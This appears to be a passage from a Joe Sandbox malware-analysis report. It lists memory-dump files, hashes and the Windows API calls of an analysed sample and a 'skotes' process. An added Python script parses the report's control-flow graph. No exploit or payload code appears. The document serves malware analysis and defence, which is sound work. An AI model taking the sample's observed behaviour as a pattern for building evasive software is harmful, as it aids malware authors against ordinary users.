• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: c13L$list too long
                                                                                                                                                                                                                                          • API String ID: 0-459378662
                                                                                                                                                                                                                                          • Opcode ID: d4b4465d6c44ec08d664cf9cbd2794cb82d9bf497a89ac095d2631f2d0b68d53
                                                                                                                                                                                                                                          • Instruction ID: 92af1516a0362c8ae8176f3a56cdf1f264fa953d93000b9313375feb3de18451
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b4465d6c44ec08d664cf9cbd2794cb82d9bf497a89ac095d2631f2d0b68d53
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2961B6B0D147199BDB10DF64CD85BA9F7B8FF14700F1081A9E80DA7281EB71AAA5CF51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 002629DF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: ___std_exception_copy
• String ID: c13L$c13L
• API String ID: 2659868963-2565585393
• Opcode ID: 7fd7ef7f904a5015bb1c01f8cab3b0f51408fce220ab819a185531c444fda868
• Instruction ID: 08d2c34af4e41a1a869c77bcf7d7912ccf45ec46f84605ab356f9d4922c8a16d
• Opcode Fuzzy Hash: 7fd7ef7f904a5015bb1c01f8cab3b0f51408fce220ab819a185531c444fda868
• Instruction Fuzzy Hash: 063180719206099BCB14DF58C845B9EFBB9FB49720F14861AF414A7780E771A964CBA0
APIs
• ___std_exception_copy.LIBVCRUNTIME ref: 00262B63
Strings
• c13L, xrefs: 00262B36
• This function cannot be called on a default constructed task, xrefs: 00262B43
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: ___std_exception_copy
• String ID: This function cannot be called on a default constructed task$c13L
• API String ID: 2659868963-3343661157
• Opcode ID: 53f01a17972194812ee2f7100d4d9e69948b5dbc5d7692943107d9ec09c12a64
• Instruction ID: 663f314cbb5326f20bb9a5113b4f8d2e7a789f9bd74922509ff6689d792b2163
• Opcode Fuzzy Hash: 53f01a17972194812ee2f7100d4d9e69948b5dbc5d7692943107d9ec09c12a64
• Instruction Fuzzy Hash: D2F08C70D202089BC720DF6898419DEFBE9EF15300B5082AEE845A7200EBB02A688B95

Execution Graph

Execution Coverage: 0.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 606
Total number of Limit Nodes: 4
execution_graph: rendered as an interactive node/edge graph in the original report (606 nodes, 4 limit nodes); the raw node and edge listing is not reproduced here. Windows API calls reached in the graph, by function address:
• 6c652b: GetPEB (via 6ca302 and at 6c653a), then ExitProcess at 6c6562
• 6acb92: CreateThreadpoolWork; 6acde1: TpPostWork; 6aca8d: TpReleaseWork
• 6abedf / 6acc3f: InitOnceExecuteOnce
• 6acce3: InitializeCriticalSectionEx; 6acd1f: RtlInitializeConditionVariable
• 6ac6ac / 6acbfb: GetSystemTimePreciseAsFileTime
• 6ad17b: RtlWakeAllConditionVariable; 6ad1a7: SleepConditionVariableCS
• 69e0c0, 69e122, 69e157: recv
• 69a953: Sleep, CreateMutexA
Most other nodes are CRT/STL internals (__cftof, __floor_pentium4, __dosmaperr, shared_ptr, Concurrency::cancel_current_task, __Mtx_init_in_situ, __Mtx_unlock, __Cnd_broadcast, _xtime_get, __Xtime_diff_to_millis2).

Control-flow Graph

Executed and not-executed blocks are distinguished by colour in the original rendering and are not marked in this listing.

control_flow_graph (function at 6c652b; block id: address range, calls and API names):
• 342: 6c652b-6c6538, call 6ca302
• 345: 6c655a-6c656c, call 6c656d, ExitProcess
• 346: 6c653a-6c6548, GetPEB
• 347: 6c654a-6c6559
Edges: 342->345, 342->346, 346->345, 346->347, 347->345
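The serialized control-flow graph above is a flat token stream, which is awkward to read by eye and to grep. The following parser, added here as an example and not part of the Joe Sandbox report or its tooling, rebuilds the basic blocks and edges from that serialization and then searches the reconstructed flow for an API chain, here the GetPEB read in block 346 that can reach the ExitProcess call in block 345. The token grammar (a block opens with a decimal id followed by a start-end address range; `call <addr>` and bare API names annotate the current block; `a->b` is an edge) is inferred from this page's listing and is an assumption; the graph string itself is copied from the report above.

```python
"""Parse a Joe Sandbox control_flow_graph serialization, rebuild basic
blocks and edges, and search for an API chain along the control flow.

Added example, not part of the sandbox report. The token grammar is
inferred from the listing on this page and is an assumption:
  <block-id> <start>-<end> [call <addr> | <ApiName>]*   opens a block
  <id>-><id>                                            defines an edge
"""
import re
from collections import defaultdict

# Control-flow graph string as serialized on this report page
# (function at 0x6c652b).
CFG_TEXT = (
    "342 6c652b-6c6538 call 6ca302 345 6c655a-6c656c call 6c656d ExitProcess "
    "342->345 346 6c653a-6c6548 GetPEB 342->346 346->345 347 6c654a-6c6559 "
    "346->347 347->345"
)

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_RANGE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$")


def parse_cfg(text):
    """Return (blocks, edges).

    blocks: id -> {"start", "end", "calls", "apis"}; addresses are ints.
    edges:  list of (src_id, dst_id) in the order they appear.
    """
    tokens = text.split()
    blocks, edges = {}, []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = _EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        # A decimal id immediately followed by an address range opens a block.
        if tok.isdigit() and i + 1 < len(tokens) and _RANGE.match(tokens[i + 1]):
            r = _RANGE.match(tokens[i + 1])
            current = int(tok)
            blocks[current] = {
                "start": int(r.group(1), 16),
                "end": int(r.group(2), 16),
                "calls": [],
                "apis": [],
            }
            i += 2
            continue
        if current is None:
            raise ValueError("annotation before any block: %r" % tok)
        if tok == "call" and i + 1 < len(tokens):
            # Internal call target (hex address), not an imported API.
            blocks[current]["calls"].append(int(tokens[i + 1], 16))
            i += 2
            continue
        # Anything else is an API name attached to the current block.
        blocks[current]["apis"].append(tok)
        i += 1
    return blocks, edges


def find_api_chain(blocks, edges, first_api, second_api):
    """Return every simple path (list of block ids) from a block that calls
    first_api to a block that calls second_api, following CFG edges."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    paths = []

    def walk(node, path):
        if second_api in blocks[node]["apis"] and len(path) > 1:
            paths.append(path)
            return
        for nxt in succ[node]:
            if nxt not in path:  # no cycles
                walk(nxt, path + [nxt])

    for bid, info in blocks.items():
        if first_api in info["apis"]:
            walk(bid, [bid])
    return paths


if __name__ == "__main__":
    blocks, edges = parse_cfg(CFG_TEXT)
    for bid in sorted(blocks):
        b = blocks[bid]
        print("block %d: %06x-%06x calls=%s apis=%s" % (
            bid, b["start"], b["end"], ["%06x" % c for c in b["calls"]], b["apis"]))
    print("edges:", edges)
    print("GetPEB -> ExitProcess paths:",
          find_api_chain(blocks, edges, "GetPEB", "ExitProcess"))
```

On this function the search returns two paths, 346->345 and 346->347->345, i.e. every successor of the GetPEB block leads to ExitProcess; the same parser runs unchanged on the per-function graphs of other report pages as long as they use the same serialization.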
APIs
• ExitProcess.KERNEL32(?,?,006C652A,?,?,?,?,?,006C7661), ref: 006C6567
Memory Dump Source
• Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310851449.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310868842.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310884881.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310908123.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2310925434.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310943679.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310963193.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310981224.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310998973.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311018419.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311037778.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311052250.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311068907.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311087153.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311110738.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311128832.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311148034.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311166818.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311184463.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311206565.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311221539.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311240106.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311255567.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311306441.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311320909.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311337615.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311352481.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311374544.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2311396158.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                                                          • Opcode ID: fcf1ead6b8b4cbe4c5ea319f6e849bdd09b845699d4ad88fb12a0417444cabb6
                                                                                                                                                                                                                                          • Instruction ID: ef39d1cebc0042485dc19b32d9799831e2ed0368eb82d71770341ecf3419f078
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcf1ead6b8b4cbe4c5ea319f6e849bdd09b845699d4ad88fb12a0417444cabb6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CE08630001148AFCE25BF14C859EA83B5AEF11749F900818F80886222CB75ED42C648

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310362606.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310380497.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310440680.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310459821.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310480195.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310578878.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310597404.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310616397.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310632940.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310689049.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310708966.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310726399.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310744767.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310761898.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310779161.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310802669.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310817843.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2310836503.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
